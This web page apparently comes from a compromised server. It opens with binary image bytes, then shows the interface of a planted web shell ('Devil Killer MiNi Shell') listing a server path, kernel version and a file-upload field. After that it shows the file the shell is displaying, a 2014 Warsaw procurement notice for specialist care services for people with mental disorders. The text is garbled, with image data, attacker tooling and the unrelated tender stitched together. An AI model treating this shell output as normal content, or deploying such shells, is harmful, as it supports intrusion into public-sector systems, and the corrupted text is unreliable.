JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140206/43546-N-2014.html

<p class="kh_header"><b>Warszawa: Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi (klientów), w tym również dla osób z autyzmem, w miejscu ich zamieszkania lub innym wskazanym przez Zamawiającego.</b><br>
<b>Numer ogłoszenia: 43546 - 2014; data zamieszczenia: 06.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Białołęka m.st. Warszawy , ul. Marywilska 44c, 03-042 Warszawa, woj. mazowieckie, tel. 22 6147000, faks 22 6147000.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opsbialoleka.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi (klientów), w tym również dla osób z autyzmem, w miejscu ich zamieszkania lub innym wskazanym przez Zamawiającego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

1.	Przedmiotem zamówienia jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi (klientów), w tym również dla osób z autyzmem, w miejscu ich zamieszkania lub innym wskazanym przez Zamawiającego, zwanych dalej usługą.
2.	Szczegółowy zakres czynności, które mogą składać się na usługę, został ustalony na  podstawie rozporządzenia Ministra Polityki Społecznej z dnia 22 września 2005 r. w  sprawie specjalistycznych usług opiekuńczych (Dz.U. Nr 189 poz. 1598 z późn. zm.) i obejmuje czynności, które zostały ujęte w wykazie, który znajduje się na końcu opisu przedmiotu zamówienia oraz zajęcia dodatkowe, zaoferowane przez Wykonawcę w koncepcji realizacji usług, o której mowa w rozdziale IX SIWZ w ust. 1 pkt 2.
3.	Prawo do korzystania z usługi będzie ustalane dla osób samotnych, które z powodu wieku, choroby lub innych przyczyn wymagają pomocy innych osób, a są jej pozbawione. Prawo to może zostać również ustalone dla osoby, która wymaga pomocy innych osób, a rodzina, a także wspólnie niezamieszkujący małżonek, wstępni, zstępni nie mogą takiej pomocy zapewnić.
4.	Wykonawca zobowiązany będzie do świadczenia usługi dostosowanej do szczególnych potrzeb klienta wynikających z rodzaju schorzenia lub niepełnosprawności zgodnie z obowiązującymi przepisami prawa.
5.	Wykonawca będzie zobowiązany zapewnić, by usługi były wykonywane wyłącznie przez osoby posiadające kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.
6.	Osoby, o których mowa w ust. 5, muszą posiadać co najmniej półroczny staż w jednej z następujących jednostek:
1)	szpitalu psychiatrycznym,
2)	jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi,
3)	placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym,
4)	ośrodku terapeutyczno-edukacyjno-wychowawczym,
5)	zakładzie rehabilitacji,
6)	innej jednostce niż wymienione w pkt 1-5, świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.
7.	W uzasadnionych przypadkach, po uzyskaniu na to przez Wykonawcę pisemnej zgody Zamawiającego, usługi będą mogły być świadczone przez osoby, które zdobywają lub podnoszą wymagane kwalifikacje zawodowe określone w ust. 5, posiadają co najmniej roczny staż pracy w jednostkach, o których mowa w ust. 6, i mają zapewnioną możliwość konsultacji z osobami świadczącymi specjalistyczne usługi, posiadającymi wymagane kwalifikacje.
8.	Osoby świadczące usługi, o których mowa w rozdz.1 w wykazie, który znajduje się na końcu opisu przedmiotu zamówienia, muszą posiadać przeszkolenie i doświadczenie w zakresie:
1)	umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań;
2)	kształtowania nawyków celowej aktywności;
3)	prowadzenia treningu zachowań społecznych.
9.	Wykonawca będzie ponosił pełną odpowiedzialność za działania i zaniechania osób wykonujących usługę.
10.	Wykonawca będzie zobowiązany przedstawić Zamawiającemu, przed rozpoczęciem wykonywania usługi przez każdą z osób, o których mowa w ust. 5, dokumenty potwierdzające posiadane przez nią kwalifikacje niezbędne do wykonywania usługi. Zamawiający jest uprawniony do weryfikacji ich prawdziwości.
11.	Wykonawca ponosił będzie pełną odpowiedzialność za szkody w mieniu klienta powstałe w  związku z wykonywaniem usługi przez Wykonawcę lub zawinione przez osoby wykonujące usługę.
12.	Wykonawca zobowiązany będzie zawrzeć umowę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia..
13.	Wykonawca będzie zobowiązany świadczyć usługę na podstawie decyzji administracyjnej wydanej przez Dyrektora Zamawiającego. W wyjątkowych przypadkach dopuszcza się zlecenie wykonania usługi za pomocą faksu przez osobę wskazaną do kontaktów w sprawie realizacji zamówienia ze strony Zamawiającego. Zlecenie takie zostanie niezwłocznie potwierdzone decyzją.
14.	Niezwłocznie po wydaniu decyzji, o której mowa w ust. 13, Zamawiający przekaże Wykonawcy drogą faksową kopię tej decyzji. Wykonawca od dnia wskazanego w decyzji będzie zobowiązany do świadczenia usługi w zakresie (czynności wybrane spośród określonych w wykazie, który znajduje się na końcu opisu przedmiotu zamówienia) i w wymiarze czasowym wskazanych w decyzji.
15.	Wykonawca będzie zobowiązany zapewnić możliwość świadczenia usługi przez siedem dni w tygodniu, w godzinach od 7:00 do 19:00, również w święta i dni ustawowo wolne od pracy.
16.	Z usługi świadczonej przez Wykonawcę będzie korzystało około 30 klientów w każdym z miesięcy obowiązywania umowy. Podana liczba klientów jest wielkością szacunkową.
17.	Przewidywana ilość godzin świadczenia usługi w każdym z miesięcy obowiązywania umowy wynosić będzie 368 godzin. Podana liczba godzin jest wielkością szacunkową. Ilość zleconych Wykonawcy przez Zamawiającego godzin świadczenia usługi wynikać będzie z rzeczywistych potrzeb klientów.
18.	Wykonawca nie będzie mógł dochodzić od Zamawiającego żadnych roszczeń w przypadku zlecenia mu w trakcie obowiązywania umowy świadczenia usługi dla mniejszej niż ustalona w ust. 16 liczby klientów lub w mniejszym niż ustalony w ust. 17 wymiarze czasowym. W przypadku gdy ilość usług będzie większa niż określona w ust. 16 i 17 Zamawiający udzieli zamówienia uzupełniającego o wartości nie większej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy - Prawo zamówień publicznych.
19.	Dokładne terminy świadczenia usługi Wykonawca uzgodni indywidualnie z każdym klientem lub jego opiekunem. Wykonawca będzie zobowiązany na każde żądanie Zamawiającego przedstawić mu szczegółową informację o rzeczywistych, ustalonych z klientami lub ich opiekunami terminach świadczenia usługi.
20.	Wykonawca jest zobowiązany do zakończenia świadczenia usługi:
a.	w dniu określonym w decyzji, o której mowa w ust. 13,
b.	w dniu wygaśnięcia umowy. Umowa wejdzie w życie z dniem jej podpisania ale nie wcześniej niż 1 marca 2014 roku i obowiązywać będzie do dnia 31 grudnia 2014 r., jednak nie dłużej niż do dnia, w którym kwota całkowitego należnego Wykonawcy na podstawie niniejszej umowy wynagrodzenia będzie równa kwocie maksymalnej wartości umowy, o której mowa w rozdz. V SIWZ (kwota, którą Zamawiający zamierza przeznaczyć na realizację zamówienia). Wykonawca nie będzie mógł dochodzić od Zamawiającego żadnych roszczeń w przypadku, gdy w dniu 31 grudnia 2014 r. kwota całkowitego należnego Wykonawcy na podstawie niniejszej umowy wynagrodzenia będzie niższa od kwoty maksymalnej wartości umowy.
21.	W wyjątkowych przypadkach, niezwłocznie po otrzymaniu faksem żądania Zamawiającego, Wykonawca będzie zobowiązany do zakończenia świadczenia usługi w terminie wcześniejszym niż określony w ust. 20. Żądanie Zamawiającego zostanie niezwłocznie przedstawione Wykonawcy na piśmie.
22.	Wykonawca, w terminie 3 dni od powzięcia wiadomości o wszelkich okolicznościach mogących mieć wpływ:
- na realizację usługi oraz
- na prawo do korzystania z usługi przez klientów, w tym na zakres usługi lub wymiar czasowy,
zobowiązany będzie do poinformowania o nich Zamawiającego.
23.	Wykonawca będzie uprawniony do składania Zamawiającemu propozycji wprowadzenia zmian w zakresie lub wymiarze czasowym świadczenia usługi na rzecz klientów. Do    wprowadzenia jakiejkolwiek zmiany niezbędna będzie pisemna zgoda Zamawiającego.
24.	Zamawiający zastrzega sobie prawo kontroli prawidłowości wykonywania usług przez Wykonawcę, w tym do kontroli ich jakości oraz zgodności z decyzjami, na podstawie których są świadczone.
25.	Strony ustalą, zgodnie z ofertą Wykonawcy, stałą w okresie obowiązywania umowy cenę ryczałtową brutto za realizację usługi za jedną godzinę świadczenia usługi na rzecz klientów.
26.	Zamawiający zapłaci Wykonawcy wynagrodzenie tylko za rzeczywistą liczbę godzin świadczenia usługi na rzecz klientów uprawnionych do korzystania z usługi w danym miesiącu.
27.	Podstawą do wypłacenia wynagrodzenia będą faktury wystawione przez Wykonawcę po zakończeniu każdego miesiąca świadczenia usługi.
28.	Wykonawca będzie zobowiązany załączyć do faktury wykaz zawierający następujące dane: nazwiska klientów korzystających z usługi oraz liczbę godzin świadczonej w tym miesiącu na ich rzecz usługi - każda godzina świadczonej usługi ma zostać potwierdzona podpisem korzystającego z niej klienta lub jego opiekuna oraz osoby wykonującej usługę u klienta.
29.	Wynagrodzenie będzie płatne w terminie 21 dni od dnia otrzymania przez Zamawiającego prawidłowo wystawionej faktury na konto Wykonawcy wskazane na fakturze.
30.	Zamawiający zastrzega sobie prawo do weryfikacji wykazu, o którym mowa w ust. 28, pod kątem jego rzetelności i zgodności ze stawianymi mu w niniejszej umowie wymogami. W przypadku stwierdzenia w nim nieprawidłowości, Ośrodek, w terminie 5 dni od otrzymania wykazu, jest uprawniony wskazać Wykonawcy na piśmie stwierdzone nieprawidłowości, a Wykonawca jest zobowiązany w terminie 5 dni do uwzględnienia uwag Ośrodka i sporządzenia wykazu w sposób prawidłowy.
31.	W przypadku gdy do faktury nie zostanie załączony wykaz, o którym mowa w ust. 28 lub zostanie on sporządzony nieprawidłowo, Zamawiający, do czasu otrzymania prawidłowo sporządzonego wykazu, będzie miał prawo powstrzymać się od wypłacenia Wykonawcy należnego mu wynagrodzenia.


Wykaz szczegółowego zakresu czynności

W ramach usługi Wykonawca jest zobowiązany świadczyć na rzecz klientów następujące rodzaje specjalistycznych usług dostosowanych do szczególnych potrzeb klientów Zamawiającego:

I.	Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia, w tym zwłaszcza:
1.	Kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych
2.	Kształtowanie umiejętności społecznego funkcjonowania
3.	Motywowanie do leczenia i rehabilitacji
4.	Motywowanie do aktywności
5.	Prowadzenie treningów umiejętności samoobsługi oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:
a)	Samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i porządkowych, w tym umiejętność utrzymania i prowadzenia domu
b)	Dbałość o higienę i wygląd
6.	Prowadzenie treningów umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:
a)	Utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki i pracy oraz ze społecznością lokalną 
b)	Wspólne organizowanie i spędzanie czasu wolnego
c)	Korzystanie z usług różnych instytucji
7.	Interwencja i pomoc w życiu w rodzinie, w tym:
a)	Pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,
b)	Kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi,
c)	Współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej,
d)	Ułatwianie dostępu do edukacji i kultury,
e)	Doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług,
8.	Pomoc w załatwianiu spraw urzędowych, w tym:
a)	W uzyskaniu świadczeń socjalnych,
b)	W wypełnianiu dokumentów urzędowych,
9.	Wspieranie i pomoc w uzyskaniu zatrudnienia, w tym zwłaszcza:
a)	W szukaniu informacji o pracy i pomoc w znalezieniu zatrudnienia lub alternatywnego zajęcia, w szczególności uczestnictwo w zajęciach terapii zajęciowej, w zakładach aktywizacji zawodowej, środowiskowych domach samopomocy, centrach i klubach integracji społecznej, klubach pracy,
b)	W kompletowaniu dokumentów potrzebnych do zatrudnienia,
c)	W przygotowaniu do rozmowy z pracodawcą, wspieranie i asystowanie w kontaktach z pracodawcą,
d)	W rozwiązywaniu problemów psychicznych wynikających z pracy lub jej braku,
10.	Pomoc w gospodarowaniu pieniędzmi, w tym:
a)	Nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,
b)	Pomoc w uzyskaniu ulg w opłatach, 
c)	Zwiększenie umiejętności i gospodarowania własnym budżetem oraz usamodzielnienie finansowe,
II.	Pielęgnacja - jako wspieranie leczenia, w tym:
1.	Pomoc w dostępie do świadczeń zdrowotnych
2.	Uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,
3.	Pomoc w wykupywaniu i zamawianiu leków w aptece,
4.	Pilnowanie przyjmowania leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania,
5.	Pomoc w dotarciu do placówek służby zdrowia,
6.	Pomoc w dotarciu do placówek rehabilitacyjnych.
III.	Rehabilitacja fizyczna i usprawnianie zaburzonych funkcji organizmu
w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz. U. Nr 210, poz. 2135, z późn. zm.):
1.	Zgodnie z zaleceniami lekarskimi lub specjalisty z zakresu rehabilitacji ruchowej lub fizjoterapii,
2.	Współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno -terapeutycznego zmierzającego do wielostronnej aktywizacji osoby korzystającej ze specjalistycznych usług.
3.	Stymulacja rozwoju i kontaktów społecznych dziecka upośledzonego i autystycznego.
IV.	Pomoc mieszkaniowa, w tym:
1.	W uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat,
2.	W organizacji drobnych remontów, adaptacji napraw, likwidacji barier architektonicznych,
3.	Kształtowanie właściwych relacji osoby uzyskującej pomoc z sąsiadami 
i gospodarzem domu.
V.	Zapewnienie dzieciom i młodzieży z zaburzeniami psychicznymi dostępu do zajęć rehabilitacyjnych i rewalidacyjno - wychowawczych, w wyjątkowych przypadkach,
  Jeżeli nie mają możliwości uzyskania dostępu do zajęć, o których mowa w art. 7 ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego (Dz. U. Nr 111, poz. 535, z późn. zm.)..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego zamówień uzupełniających o wartości do 50% wartości zamówienia podstawowego i zakresie tożsamym co zamówienie podstawowe.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.24.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek będzie spełniony jeśli Wykonawca wykaże, iż dysponuje:
10 osobami posiadającymi kwalifikacje do wykonywania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi, które zostały określone w rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U. Nr 189 poz. 1598 z późn. zm.). Osoby te muszą:
1)	posiadać kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi
2)	posiadać co najmniej półroczny staż w jednej z następujących jednostek:
a)	szpitalu psychiatrycznym,
b)	jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi,
c)	placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym,
d)	ośrodku terapeutyczno-edukacyjno- wychowawczym,
e)	zakładzie rehabilitacji,
f)	innej jednostce niż wymienione w lit. a)-e), świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.
3)	W uzasadnionych przypadkach, po uzyskaniu na to przez Wykonawcę pisemnej zgody Zamawiającego, usługi będą mogły być świadczone przez osoby, które zdobywają lub podnoszą wymagane kwalifikacje zawodowe określone w pkt. 1), posiadają co najmniej roczny staż pracy w jednostkach, o których mowa w pkt 2), i mają zapewnioną możliwość konsultacji z osobami świadczącymi specjalistyczne usługi, posiadającymi wymagane kwalifikacje.
4)	Osoby świadczące usługi, o których mowa w rozdz. I w wykazie, który znajduje się na końcu opisu przedmiotu zamówienia, muszą posiadać przeszkolenie i doświadczenie w zakresie:
a)	umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań;
b)	kształtowania nawyków celowej aktywności;
c)	prowadzenia treningu zachowań społecznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

